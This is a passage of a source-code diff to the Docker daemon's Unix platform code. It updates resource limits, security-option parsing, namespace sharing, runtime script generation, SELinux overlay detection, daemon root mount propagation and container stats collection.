int64(period) / 1e9 cpu.Period = &period cpu.Quota = 
"a } @@ -124,8 +147,8 @@ func getCPUResources(config containertypes.Resources) *specs.CPU { } if config.CPUQuota != 0 { - quota := uint64(config.CPUQuota) - cpu.Quota = "a + q := config.CPUQuota + cpu.Quota = &q } if config.CPURealtimePeriod != 0 { @@ -134,23 +157,23 @@ func getCPUResources(config containertypes.Resources) *specs.CPU { } if config.CPURealtimeRuntime != 0 { - runtime := uint64(config.CPURealtimeRuntime) - cpu.RealtimeRuntime = &runtime + c := config.CPURealtimeRuntime + cpu.RealtimeRuntime = &c } - return &cpu + return &cpu, nil } -func getBlkioWeightDevices(config containertypes.Resources) ([]specs.WeightDevice, error) { - var stat syscall.Stat_t - var blkioWeightDevices []specs.WeightDevice +func getBlkioWeightDevices(config containertypes.Resources) ([]specs.LinuxWeightDevice, error) { + var stat unix.Stat_t + var blkioWeightDevices []specs.LinuxWeightDevice for _, weightDevice := range config.BlkioWeightDevice { - if err := syscall.Stat(weightDevice.Path, &stat); err != nil { + if err := unix.Stat(weightDevice.Path, &stat); err != nil { return nil, err } weight := weightDevice.Weight - d := specs.WeightDevice{Weight: &weight} + d := specs.LinuxWeightDevice{Weight: &weight} d.Major = int64(stat.Rdev / 256) d.Minor = int64(stat.Rdev % 256) blkioWeightDevices = append(blkioWeightDevices, d) @@ -159,6 +182,11 @@ func getBlkioWeightDevices(config containertypes.Resources) ([]specs.WeightDevic return blkioWeightDevices, nil } +func (daemon *Daemon) parseSecurityOpt(container *container.Container, hostConfig *containertypes.HostConfig) error { + container.NoNewPrivileges = daemon.configStore.NoNewPrivileges + return parseSecurityOpt(container, hostConfig) +} + func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { var ( labelOpts []string @@ -170,15 +198,18 @@ func parseSecurityOpt(container *container.Container, config *containertypes.Hos container.NoNewPrivileges = true continue } + if opt == "disable" { + 
labelOpts = append(labelOpts, "disable") + continue + } var con []string if strings.Contains(opt, "=") { con = strings.SplitN(opt, "=", 2) } else if strings.Contains(opt, ":") { con = strings.SplitN(opt, ":", 2) - logrus.Warn("Security options with `:` as a separator are deprecated and will be completely unsupported in 1.14, use `=` instead.") + logrus.Warn("Security options with `:` as a separator are deprecated and will be completely unsupported in 17.04, use `=` instead.") } - if len(con) != 2 { return fmt.Errorf("invalid --security-opt 1: %q", opt) } @@ -190,6 +221,12 @@ func parseSecurityOpt(container *container.Container, config *containertypes.Hos container.AppArmorProfile = con[1] case "seccomp": container.SeccompProfile = con[1] + case "no-new-privileges": + noNewPrivileges, err := strconv.ParseBool(con[1]) + if err != nil { + return fmt.Errorf("invalid --security-opt 2: %q", opt) + } + container.NoNewPrivileges = noNewPrivileges default: return fmt.Errorf("invalid --security-opt 2: %q", opt) } @@ -199,16 +236,15 @@ func parseSecurityOpt(container *container.Container, config *containertypes.Hos return err } -func getBlkioThrottleDevices(devs []*blkiodev.ThrottleDevice) ([]specs.ThrottleDevice, error) { - var throttleDevices []specs.ThrottleDevice - var stat syscall.Stat_t +func getBlkioThrottleDevices(devs []*blkiodev.ThrottleDevice) ([]specs.LinuxThrottleDevice, error) { + var throttleDevices []specs.LinuxThrottleDevice + var stat unix.Stat_t for _, d := range devs { - if err := syscall.Stat(d.Path, &stat); err != nil { + if err := unix.Stat(d.Path, &stat); err != nil { return nil, err } - rate := d.Rate - d := specs.ThrottleDevice{Rate: &rate} + d := specs.LinuxThrottleDevice{Rate: d.Rate} d.Major = int64(stat.Rdev / 256) d.Minor = int64(stat.Rdev % 256) throttleDevices = append(throttleDevices, d) @@ -254,18 +290,28 @@ func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConf hostConfig.MemorySwap = hostConfig.Memory * 2 } if 
hostConfig.ShmSize == 0 { - hostConfig.ShmSize = container.DefaultSHMSize + hostConfig.ShmSize = config.DefaultShmSize + if daemon.configStore != nil { + hostConfig.ShmSize = int64(daemon.configStore.ShmSize) + } + } + // Set default IPC mode, if unset for container + if hostConfig.IpcMode.IsEmpty() { + m := config.DefaultIpcMode + if daemon.configStore != nil { + m = daemon.configStore.IpcMode + } + hostConfig.IpcMode = containertypes.IpcMode(m) } + + adaptSharedNamespaceContainer(daemon, hostConfig) + var err error - opts, err := daemon.generateSecurityOpt(hostConfig.IpcMode, hostConfig.PidMode, hostConfig.Privileged) + opts, err := daemon.generateSecurityOpt(hostConfig) if err != nil { return err } hostConfig.SecurityOpt = append(hostConfig.SecurityOpt, opts...) - if hostConfig.MemorySwappiness == nil { - defaultSwappiness := int64(-1) - hostConfig.MemorySwappiness = &defaultSwappiness - } if hostConfig.OomKillDisable == nil { defaultOomKillDisable := false hostConfig.OomKillDisable = &defaultOomKillDisable @@ -274,8 +320,39 @@ func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConf return nil } +// adaptSharedNamespaceContainer replaces container name with its ID in hostConfig. +// To be more precisely, it modifies `container:name` to `container:ID` of PidMode, IpcMode +// and NetworkMode. +// +// When a container shares its namespace with another container, use ID can keep the namespace +// sharing connection between the two containers even the another container is renamed. 
+func adaptSharedNamespaceContainer(daemon containerGetter, hostConfig *containertypes.HostConfig) { + containerPrefix := "container:" + if hostConfig.PidMode.IsContainer() { + pidContainer := hostConfig.PidMode.Container() + // if there is any error returned here, we just ignore it and leave it to be + // handled in the following logic + if c, err := daemon.GetContainer(pidContainer); err == nil { + hostConfig.PidMode = containertypes.PidMode(containerPrefix + c.ID) + } + } + if hostConfig.IpcMode.IsContainer() { + ipcContainer := hostConfig.IpcMode.Container() + if c, err := daemon.GetContainer(ipcContainer); err == nil { + hostConfig.IpcMode = containertypes.IpcMode(containerPrefix + c.ID) + } + } + if hostConfig.NetworkMode.IsContainer() { + netContainer := hostConfig.NetworkMode.ConnectedContainer() + if c, err := daemon.GetContainer(netContainer); err == nil { + hostConfig.NetworkMode = containertypes.NetworkMode(containerPrefix + c.ID) + } + } +} + func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysinfo.SysInfo, update bool) ([]string, error) { warnings := []string{} + fixMemorySwappiness(resources) // memory subsystem checks and adjustments if resources.Memory != 0 && resources.Memory < linuxMinMemory { @@ -298,14 +375,14 @@ func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysi if resources.Memory == 0 && resources.MemorySwap > 0 && !update { return warnings, fmt.Errorf("You should always set the Memory limit when using Memoryswap limit, see usage") } - if resources.MemorySwappiness != nil && *resources.MemorySwappiness != -1 && !sysInfo.MemorySwappiness { + if resources.MemorySwappiness != nil && !sysInfo.MemorySwappiness { warnings = append(warnings, "Your kernel does not support memory swappiness capabilities or the cgroup is not mounted. Memory swappiness discarded.") logrus.Warn("Your kernel does not support memory swappiness capabilities, or the cgroup is not mounted. 
Memory swappiness discarded.") resources.MemorySwappiness = nil } if resources.MemorySwappiness != nil { swappiness := *resources.MemorySwappiness - if swappiness < -1 || swappiness > 100 { + if swappiness < 0 || swappiness > 100 { return warnings, fmt.Errorf("Invalid value: %v, valid memory swappiness range is 0-100", swappiness) } } @@ -444,6 +521,7 @@ func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysi warnings = append(warnings, "Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.") logrus.Warn("Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.") resources.BlkioDeviceWriteBps = []*pblkiodev.ThrottleDevice{} + } if len(resources.BlkioDeviceReadIOps) > 0 && !sysInfo.BlkioReadIOpsDevice { warnings = append(warnings, "Your kernel does not support IOPS Block read limit or the cgroup is not mounted. Block I/O IOPS read limit discarded.") @@ -469,7 +547,7 @@ func (daemon *Daemon) getCgroupDriver() string { } // getCD gets the raw value of the native.cgroupdriver option, if set. 
-func getCD(config *Config) string { +func getCD(config *config.Config) string { for _, option := range config.ExecOptions { key, val, err := parsers.ParseKeyValueOpt(option) if err != nil || !strings.EqualFold(key, "native.cgroupdriver") { @@ -481,7 +559,7 @@ func getCD(config *Config) string { } // VerifyCgroupDriver validates native.cgroupdriver -func VerifyCgroupDriver(config *Config) error { +func VerifyCgroupDriver(config *config.Config) error { cd := getCD(config) if cd == "" || cd == cgroupFsDriver || cd == cgroupSystemdDriver { return nil @@ -490,21 +568,16 @@ func VerifyCgroupDriver(config *Config) error { } // UsingSystemd returns true if cli option includes native.cgroupdriver=systemd -func UsingSystemd(config *Config) bool { +func UsingSystemd(config *config.Config) bool { return getCD(config) == cgroupSystemdDriver } // verifyPlatformContainerSettings performs platform-specific validation of the // hostconfig and config structures. func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { - warnings := []string{} + var warnings []string sysInfo := sysinfo.New(true) - warnings, err := daemon.verifyExperimentalContainerSettings(hostConfig, config) - if err != nil { - return warnings, err - } - w, err := verifyContainerResources(&hostConfig.Resources, sysInfo, update) // no matter err is nil or not, w could have data in itself. @@ -530,13 +603,13 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes. // check for various conflicting options with user namespaces if daemon.configStore.RemappedRoot != "" && hostConfig.UsernsMode.IsPrivate() { if hostConfig.Privileged { - return warnings, fmt.Errorf("Privileged mode is incompatible with user namespaces") + return warnings, fmt.Errorf("privileged mode is incompatible with user namespaces. 
You must run the container in the host namespace when running privileged mode") } if hostConfig.NetworkMode.IsHost() && !hostConfig.UsernsMode.IsHost() { - return warnings, fmt.Errorf("Cannot share the host's network namespace when user namespaces are enabled") + return warnings, fmt.Errorf("cannot share the host's network namespace when user namespaces are enabled") } if hostConfig.PidMode.IsHost() && !hostConfig.UsernsMode.IsHost() { - return warnings, fmt.Errorf("Cannot share the host PID namespace when user namespaces are enabled") + return warnings, fmt.Errorf("cannot share the host PID namespace when user namespaces are enabled") } } if hostConfig.CgroupParent != "" && UsingSystemd(daemon.configStore) { @@ -553,64 +626,92 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes. return warnings, fmt.Errorf("Unknown runtime specified %s", hostConfig.Runtime) } + parser := volumemounts.NewParser(runtime.GOOS) + for dest := range hostConfig.Tmpfs { + if err := parser.ValidateTmpfsMountDestination(dest); err != nil { + return warnings, err + } + } + return warnings, nil } -// platformReload update configuration with platform specific options -func (daemon *Daemon) platformReload(config *Config) map[string]string { - if config.IsValueSet("runtimes") { - daemon.configStore.Runtimes = config.Runtimes - // Always set the default one - daemon.configStore.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary} - } +func (daemon *Daemon) loadRuntimes() error { + return daemon.initRuntimes(daemon.configStore.Runtimes) +} - if config.DefaultRuntime != "" { - daemon.configStore.DefaultRuntime = config.DefaultRuntime +func (daemon *Daemon) initRuntimes(runtimes map[string]types.Runtime) (err error) { + runtimeDir := filepath.Join(daemon.configStore.Root, "runtimes") + // Remove old temp directory if any + os.RemoveAll(runtimeDir + "-old") + tmpDir, err := ioutils.TempDir(daemon.configStore.Root, "gen-runtimes") + if err != nil { + 
return errors.Wrapf(err, "failed to get temp dir to generate runtime scripts") } + defer func() { + if err != nil { + if err1 := os.RemoveAll(tmpDir); err1 != nil { + logrus.WithError(err1).WithField("dir", tmpDir). + Warnf("failed to remove tmp dir") + } + return + } - // Update attributes - var runtimeList bytes.Buffer - for name, rt := range daemon.configStore.Runtimes { - if runtimeList.Len() > 0 { - runtimeList.WriteRune(' ') + if err = os.Rename(runtimeDir, runtimeDir+"-old"); err != nil { + return } - runtimeList.WriteString(fmt.Sprintf("%s:%s", name, rt)) - } + if err = os.Rename(tmpDir, runtimeDir); err != nil { + err = errors.Wrapf(err, "failed to setup runtimes dir, new containers may not start") + return + } + if err = os.RemoveAll(runtimeDir + "-old"); err != nil { + logrus.WithError(err).WithField("dir", tmpDir). + Warnf("failed to remove old runtimes dir") + } + }() - return map[string]string{ - "runtimes": runtimeList.String(), - "default-runtime": daemon.configStore.DefaultRuntime, + for name, rt := range runtimes { + if len(rt.Args) == 0 { + continue + } + + script := filepath.Join(tmpDir, name) + content := fmt.Sprintf("#!/bin/sh\n%s %s $@\n", rt.Path, strings.Join(rt.Args, " ")) + if err := ioutil.WriteFile(script, []byte(content), 0700); err != nil { + return err + } } + return nil } // verifyDaemonSettings performs validation of daemon config struct -func verifyDaemonSettings(config *Config) error { +func verifyDaemonSettings(conf *config.Config) error { // Check for mutually incompatible config options - if config.bridgeConfig.Iface != "" && config.bridgeConfig.IP != "" { + if conf.BridgeConfig.Iface != "" && conf.BridgeConfig.IP != "" { return fmt.Errorf("You specified -b & --bip, mutually exclusive options. 
Please specify only one") } - if !config.bridgeConfig.EnableIPTables && !config.bridgeConfig.InterContainerCommunication { + if !conf.BridgeConfig.EnableIPTables && !conf.BridgeConfig.InterContainerCommunication { return fmt.Errorf("You specified --iptables=false with --icc=false. ICC=false uses iptables to function. Please set --icc or --iptables to true") } - if !config.bridgeConfig.EnableIPTables && config.bridgeConfig.EnableIPMasq { - config.bridgeConfig.EnableIPMasq = false + if !conf.BridgeConfig.EnableIPTables && conf.BridgeConfig.EnableIPMasq { + conf.BridgeConfig.EnableIPMasq = false } - if err := VerifyCgroupDriver(config); err != nil { + if err := VerifyCgroupDriver(conf); err != nil { return err } - if config.CgroupParent != "" && UsingSystemd(config) { - if len(config.CgroupParent) <= 6 || !strings.HasSuffix(config.CgroupParent, ".slice") { + if conf.CgroupParent != "" && UsingSystemd(conf) { + if len(conf.CgroupParent) <= 6 || !strings.HasSuffix(conf.CgroupParent, ".slice") { return fmt.Errorf("cgroup-parent for systemd cgroup should be a valid slice named as \"xxx.slice\"") } } - if config.DefaultRuntime == "" { - config.DefaultRuntime = stockRuntimeName + if conf.DefaultRuntime == "" { + conf.DefaultRuntime = config.StockRuntimeName } - if config.Runtimes == nil { - config.Runtimes = make(map[string]types.Runtime) + if conf.Runtimes == nil { + conf.Runtimes = make(map[string]types.Runtime) } - config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary} + conf.Runtimes[config.StockRuntimeName] = types.Runtime{Path: DefaultRuntimeName} return nil } @@ -625,7 +726,7 @@ func checkSystem() error { // configureMaxThreads sets the Go runtime max threads threshold // which is 90% of the kernel setting from /proc/sys/kernel/threads-max -func configureMaxThreads(config *Config) error { +func configureMaxThreads(config *config.Config) error { mt, err := ioutil.ReadFile("/proc/sys/kernel/threads-max") if err != nil { return err @@ -640,11 
+741,56 @@ func configureMaxThreads(config *Config) error { return nil } +func overlaySupportsSelinux() (bool, error) { + f, err := os.Open("/proc/kallsyms") + if err != nil { + if os.IsNotExist(err) { + return false, nil + } + return false, err + } + defer f.Close() + + var symAddr, symType, symName, text string + + s := bufio.NewScanner(f) + for s.Scan() { + if err := s.Err(); err != nil { + return false, err + } + + text = s.Text() + if _, err := fmt.Sscanf(text, "%s %s %s", &symAddr, &symType, &symName); err != nil { + return false, fmt.Errorf("Scanning '%s' failed: %s", text, err) + } + + // Check for presence of symbol security_inode_copy_up. + if symName == "security_inode_copy_up" { + return true, nil + } + } + return false, nil +} + // configureKernelSecuritySupport configures and validates security support for the kernel -func configureKernelSecuritySupport(config *Config, driverName string) error { +func configureKernelSecuritySupport(config *config.Config, driverName string) error { if config.EnableSelinuxSupport { if !selinuxEnabled() { logrus.Warn("Docker could not enable SELinux on the host system") + return nil + } + + if driverName == "overlay" || driverName == "overlay2" { + // If driver is overlay or overlay2, make sure kernel + // supports selinux with overlay. 
+ supported, err := overlaySupportsSelinux() + if err != nil { + return err + } + + if !supported { + logrus.Warnf("SELinux is not supported with the %v graph driver on this kernel", driverName) + } } } else { selinuxSetDisabled() @@ -652,7 +798,7 @@ func configureKernelSecuritySupport(config *Config, driverName string) error { return nil } -func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { +func (daemon *Daemon) initNetworkController(config *config.Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes) if err != nil { return nil, err @@ -687,6 +833,9 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ if err = n.Delete(); err != nil { return nil, fmt.Errorf("could not delete the default bridge network: %v", err) } + if len(config.NetworkConfig.DefaultAddressPools.Value()) > 0 && !daemon.configStore.LiveRestoreEnabled { + removeDefaultBridgeInterface() + } } if !config.DisableBridge { @@ -701,12 +850,12 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ return controller, nil } -func driverOptions(config *Config) []nwconfig.Option { +func driverOptions(config *config.Config) []nwconfig.Option { bridgeConfig := options.Generic{ - "EnableIPForwarding": config.bridgeConfig.EnableIPForward, - "EnableIPTables": config.bridgeConfig.EnableIPTables, - "EnableUserlandProxy": config.bridgeConfig.EnableUserlandProxy, - "UserlandProxyPath": config.bridgeConfig.UserlandProxyPath} + "EnableIPForwarding": config.BridgeConfig.EnableIPForward, + "EnableIPTables": config.BridgeConfig.EnableIPTables, + "EnableUserlandProxy": config.BridgeConfig.EnableUserlandProxy, + "UserlandProxyPath": config.BridgeConfig.UserlandProxyPath} bridgeOption := options.Generic{netlabel.GenericData: bridgeConfig} dOptions := 
[]nwconfig.Option{} @@ -714,22 +863,22 @@ func driverOptions(config *Config) []nwconfig.Option { return dOptions } -func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { +func initBridgeDriver(controller libnetwork.NetworkController, config *config.Config) error { bridgeName := bridge.DefaultBridgeName - if config.bridgeConfig.Iface != "" { - bridgeName = config.bridgeConfig.Iface + if config.BridgeConfig.Iface != "" { + bridgeName = config.BridgeConfig.Iface } netOption := map[string]string{ bridge.BridgeName: bridgeName, bridge.DefaultBridge: strconv.FormatBool(true), netlabel.DriverMTU: strconv.Itoa(config.Mtu), - bridge.EnableIPMasquerade: strconv.FormatBool(config.bridgeConfig.EnableIPMasq), - bridge.EnableICC: strconv.FormatBool(config.bridgeConfig.InterContainerCommunication), + bridge.EnableIPMasquerade: strconv.FormatBool(config.BridgeConfig.EnableIPMasq), + bridge.EnableICC: strconv.FormatBool(config.BridgeConfig.InterContainerCommunication), } // --ip processing - if config.bridgeConfig.DefaultIP != nil { - netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String() + if config.BridgeConfig.DefaultIP != nil { + netOption[bridge.DefaultBindingIP] = config.BridgeConfig.DefaultIP.String() } var ( @@ -745,8 +894,8 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e } nw := nwList[0] - if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" { - _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if len(nwList) > 1 && config.BridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.BridgeConfig.FixedCIDR) if err != nil { return errors.Wrap(err, "parse CIDR failed") } @@ -765,9 +914,9 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e ipamV4Conf.Gateway = nw.IP.String() } - if config.bridgeConfig.IP != "" { - ipamV4Conf.PreferredPool = config.bridgeConfig.IP - ip, _, err := net.ParseCIDR(config.bridgeConfig.IP) + if 
config.BridgeConfig.IP != "" { + ipamV4Conf.PreferredPool = config.BridgeConfig.IP + ip, _, err := net.ParseCIDR(config.BridgeConfig.IP) if err != nil { return err } @@ -776,8 +925,8 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e logrus.Infof("Default bridge (%s) is assigned with an IP address %s. Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool) } - if config.bridgeConfig.FixedCIDR != "" { - _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if config.BridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.BridgeConfig.FixedCIDR) if err != nil { return err } @@ -785,13 +934,13 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e ipamV4Conf.SubPool = fCIDR.String() } - if config.bridgeConfig.DefaultGatewayIPv4 != nil { - ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String() + if config.BridgeConfig.DefaultGatewayIPv4 != nil { + ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.BridgeConfig.DefaultGatewayIPv4.String() } var deferIPv6Alloc bool - if config.bridgeConfig.FixedCIDRv6 != "" { - _, fCIDRv6, err := net.ParseCIDR(config.bridgeConfig.FixedCIDRv6) + if config.BridgeConfig.FixedCIDRv6 != "" { + _, fCIDRv6, err := net.ParseCIDR(config.BridgeConfig.FixedCIDRv6) if err != nil { return err } @@ -821,11 +970,11 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e } } - if config.bridgeConfig.DefaultGatewayIPv6 != nil { + if config.BridgeConfig.DefaultGatewayIPv6 != nil { if ipamV6Conf == nil { ipamV6Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} } - ipamV6Conf.AuxAddresses["DefaultGatewayIPv6"] = config.bridgeConfig.DefaultGatewayIPv6.String() + ipamV6Conf.AuxAddresses["DefaultGatewayIPv6"] = config.BridgeConfig.DefaultGatewayIPv6.String() } v4Conf := []*libnetwork.IpamConf{ipamV4Conf} @@ -835,7 +984,7 @@ func 
initBridgeDriver(controller libnetwork.NetworkController, config *Config) e } // Initialize default network on "bridge" with the same name _, err = controller.NewNetwork("bridge", "bridge", "", - libnetwork.NetworkOptionEnableIPv6(config.bridgeConfig.EnableIPv6), + libnetwork.NetworkOptionEnableIPv6(config.BridgeConfig.EnableIPv6), libnetwork.NetworkOptionDriverOpts(netOption), libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil), libnetwork.NetworkOptionDeferIPv6Alloc(deferIPv6Alloc)) @@ -854,8 +1003,10 @@ func removeDefaultBridgeInterface() { } } -func (daemon *Daemon) getLayerInit() func(string) error { - return daemon.setupInitLayer +func setupInitLayer(idMappings *idtools.IDMappings) func(containerfs.ContainerFS) error { + return func(initPath containerfs.ContainerFS) error { + return initlayer.Setup(initPath, idMappings.RootPair()) + } } // Parse the remapped root (user namespace) option, which can be one of: @@ -925,7 +1076,6 @@ func parseRemappedRoot(usergrp string) (string, string, error) { if err != nil { return "", "", fmt.Errorf("Error during gid lookup for %q: %v", lookupName, err) } - groupID = group.Gid groupname = group.Name } } @@ -952,40 +1102,38 @@ func parseRemappedRoot(usergrp string) (string, string, error) { return username, groupname, nil } -func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { +func setupRemappedRoot(config *config.Config) (*idtools.IDMappings, error) { if runtime.GOOS != "linux" && config.RemappedRoot != "" { - return nil, nil, fmt.Errorf("User namespaces are only supported on Linux") + return nil, fmt.Errorf("User namespaces are only supported on Linux") } // if the daemon was started with remapped root option, parse // the config option to the int uid,gid values - var ( - uidMaps, gidMaps []idtools.IDMap - ) if config.RemappedRoot != "" { username, groupname, err := parseRemappedRoot(config.RemappedRoot) if err != nil { - return nil, nil, err + return nil, err } if username == 
"root" { // Cannot setup user namespaces with a 1-to-1 mapping; "--root=0:0" is a no-op // effectively logrus.Warn("User namespaces: root cannot be remapped with itself; user namespaces are OFF") - return uidMaps, gidMaps, nil + return &idtools.IDMappings{}, nil } logrus.Infof("User namespaces: ID ranges will be mapped to subuid/subgid ranges of: %s:%s", username, groupname) // update remapped root setting now that we have resolved them to actual names config.RemappedRoot = fmt.Sprintf("%s:%s", username, groupname) - uidMaps, gidMaps, err = idtools.CreateIDMappings(username, groupname) + mappings, err := idtools.NewIDMappings(username, groupname) if err != nil { - return nil, nil, fmt.Errorf("Can't create ID mappings: %v", err) + return nil, errors.Wrapf(err, "Can't create ID mappings: %v") } + return mappings, nil } - return uidMaps, gidMaps, nil + return &idtools.IDMappings{}, nil } -func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { +func setupDaemonRoot(config *config.Config, rootDir string, rootIDs idtools.IDPair) error { config.Root = rootDir // the docker root metadata directory needs to have execute permissions for all users (g+x,o+x) // so that syscalls executing as non-root, operating on subdirectories of the graph root @@ -1010,10 +1158,10 @@ func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error // a new subdirectory with ownership set to the remapped uid/gid (so as to allow // `chdir()` to work for containers namespaced to that uid/gid) if config.RemappedRoot != "" { - config.Root = filepath.Join(rootDir, fmt.Sprintf("%d.%d", rootUID, rootGID)) + config.Root = filepath.Join(rootDir, fmt.Sprintf("%d.%d", rootIDs.UID, rootIDs.GID)) logrus.Debugf("Creating user namespaced daemon root: %s", config.Root) // Create the root directory if it doesn't exist - if err := idtools.MkdirAllAs(config.Root, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(config.Root, 0700, rootIDs); 
err != nil { return fmt.Errorf("Cannot create daemon root: %s: %v", config.Root, err) } // we also need to verify that any pre-existing directories in the path to @@ -1026,14 +1174,63 @@ func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error if dirPath == "/" { break } - if !idtools.CanAccess(dirPath, rootUID, rootGID) { - return fmt.Errorf("A subdirectory in your graphroot path (%s) restricts access to the remapped root uid/gid; please fix by allowing 'o+x' permissions on existing directories.", config.Root) + if !idtools.CanAccess(dirPath, rootIDs) { + return fmt.Errorf("a subdirectory in your graphroot path (%s) restricts access to the remapped root uid/gid; please fix by allowing 'o+x' permissions on existing directories", config.Root) } } } + + if err := setupDaemonRootPropagation(config); err != nil { + logrus.WithError(err).WithField("dir", config.Root).Warn("Error while setting daemon root propagation, this is not generally critical but may cause some functionality to not work or fallback to less desirable behavior") + } + return nil +} + +func setupDaemonRootPropagation(cfg *config.Config) error { + rootParentMount, options, err := getSourceMount(cfg.Root) + if err != nil { + return errors.Wrap(err, "error getting daemon root's parent mount") + } + + var cleanupOldFile bool + cleanupFile := getUnmountOnShutdownPath(cfg) + defer func() { + if !cleanupOldFile { + return + } + if err := os.Remove(cleanupFile); err != nil && !os.IsNotExist(err) { + logrus.WithError(err).WithField("file", cleanupFile).Warn("could not clean up old root propagation unmount file") + } + }() + + if hasMountinfoOption(options, sharedPropagationOption, slavePropagationOption) { + cleanupOldFile = true + return nil + } + + if err := mount.MakeShared(cfg.Root); err != nil { + return errors.Wrap(err, "could not setup daemon root propagation to shared") + } + + // check the case where this may have already been a mount to itself. 
+ // If so then the daemon only performed a remount and should not try to unmount this later. + if rootParentMount == cfg.Root { + cleanupOldFile = true + return nil + } + + if err := ioutil.WriteFile(cleanupFile, nil, 0600); err != nil { + return errors.Wrap(err, "error writing file to signal mount cleanup on shutdown") + } return nil } +// getUnmountOnShutdownPath generates the path to used when writing the file that signals to the daemon that on shutdown +// the daemon root should be unmounted. +func getUnmountOnShutdownPath(config *config.Config) string { + return filepath.Join(config.ExecRoot, "unmount-on-shutdown") +} + // registerLinks writes the links to a file. func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error { if hostConfig == nil || hostConfig.NetworkMode.IsUserDefined() { @@ -1041,19 +1238,19 @@ func (daemon *Daemon) registerLinks(container *container.Container, hostConfig * } for _, l := range hostConfig.Links { - name, alias, err := runconfigopts.ParseLink(l) + name, alias, err := opts.ParseLink(l) if err != nil { return err } child, err := daemon.GetContainer(name) if err != nil { - return fmt.Errorf("Could not get container for %s", name) + return errors.Wrapf(err, "could not get container for %s", name) } for child.HostConfig.NetworkMode.IsContainer() { parts := strings.SplitN(string(child.HostConfig.NetworkMode), ":", 2) child, err = daemon.GetContainer(parts[1]) if err != nil { - return fmt.Errorf("Could not get container for %s", parts[1]) + return errors.Wrapf(err, "Could not get container for %s", parts[1]) } } if child.HostConfig.NetworkMode.IsHost() { @@ -1066,7 +1263,8 @@ func (daemon *Daemon) registerLinks(container *container.Container, hostConfig * // After we load all the links into the daemon // set them to nil on the hostconfig - return container.WriteHostConfig() + _, err := container.WriteHostConfig() + return err } // conditionalMountOnStart is a platform specific 
helper function during the @@ -1081,63 +1279,123 @@ func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container return daemon.Unmount(container) } +func copyBlkioEntry(entries []*containerd_cgroups.BlkIOEntry) []types.BlkioStatEntry { + out := make([]types.BlkioStatEntry, len(entries)) + for i, re := range entries { + out[i] = types.BlkioStatEntry{ + Major: re.Major, + Minor: re.Minor, + Op: re.Op, + Value: re.Value, + } + } + return out +} + func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { if !c.IsRunning() { - return nil, errNotRunning{c.ID} + return nil, errNotRunning(c.ID) } - stats, err := daemon.containerd.Stats(c.ID) + cs, err := daemon.containerd.Stats(context.Background(), c.ID) if err != nil { + if strings.Contains(err.Error(), "container not found") { + return nil, containerNotFound(c.ID) + } return nil, err } s := &types.StatsJSON{} - cgs := stats.CgroupStats - if cgs != nil { + s.Read = cs.Read + stats := cs.Metrics + if stats.Blkio != nil { s.BlkioStats = types.BlkioStats{ - IoServiceBytesRecursive: copyBlkioEntry(cgs.BlkioStats.IoServiceBytesRecursive), - IoServicedRecursive: copyBlkioEntry(cgs.BlkioStats.IoServicedRecursive), - IoQueuedRecursive: copyBlkioEntry(cgs.BlkioStats.IoQueuedRecursive), - IoServiceTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoServiceTimeRecursive), - IoWaitTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoWaitTimeRecursive), - IoMergedRecursive: copyBlkioEntry(cgs.BlkioStats.IoMergedRecursive), - IoTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoTimeRecursive), - SectorsRecursive: copyBlkioEntry(cgs.BlkioStats.SectorsRecursive), - } - cpu := cgs.CpuStats + IoServiceBytesRecursive: copyBlkioEntry(stats.Blkio.IoServiceBytesRecursive), + IoServicedRecursive: 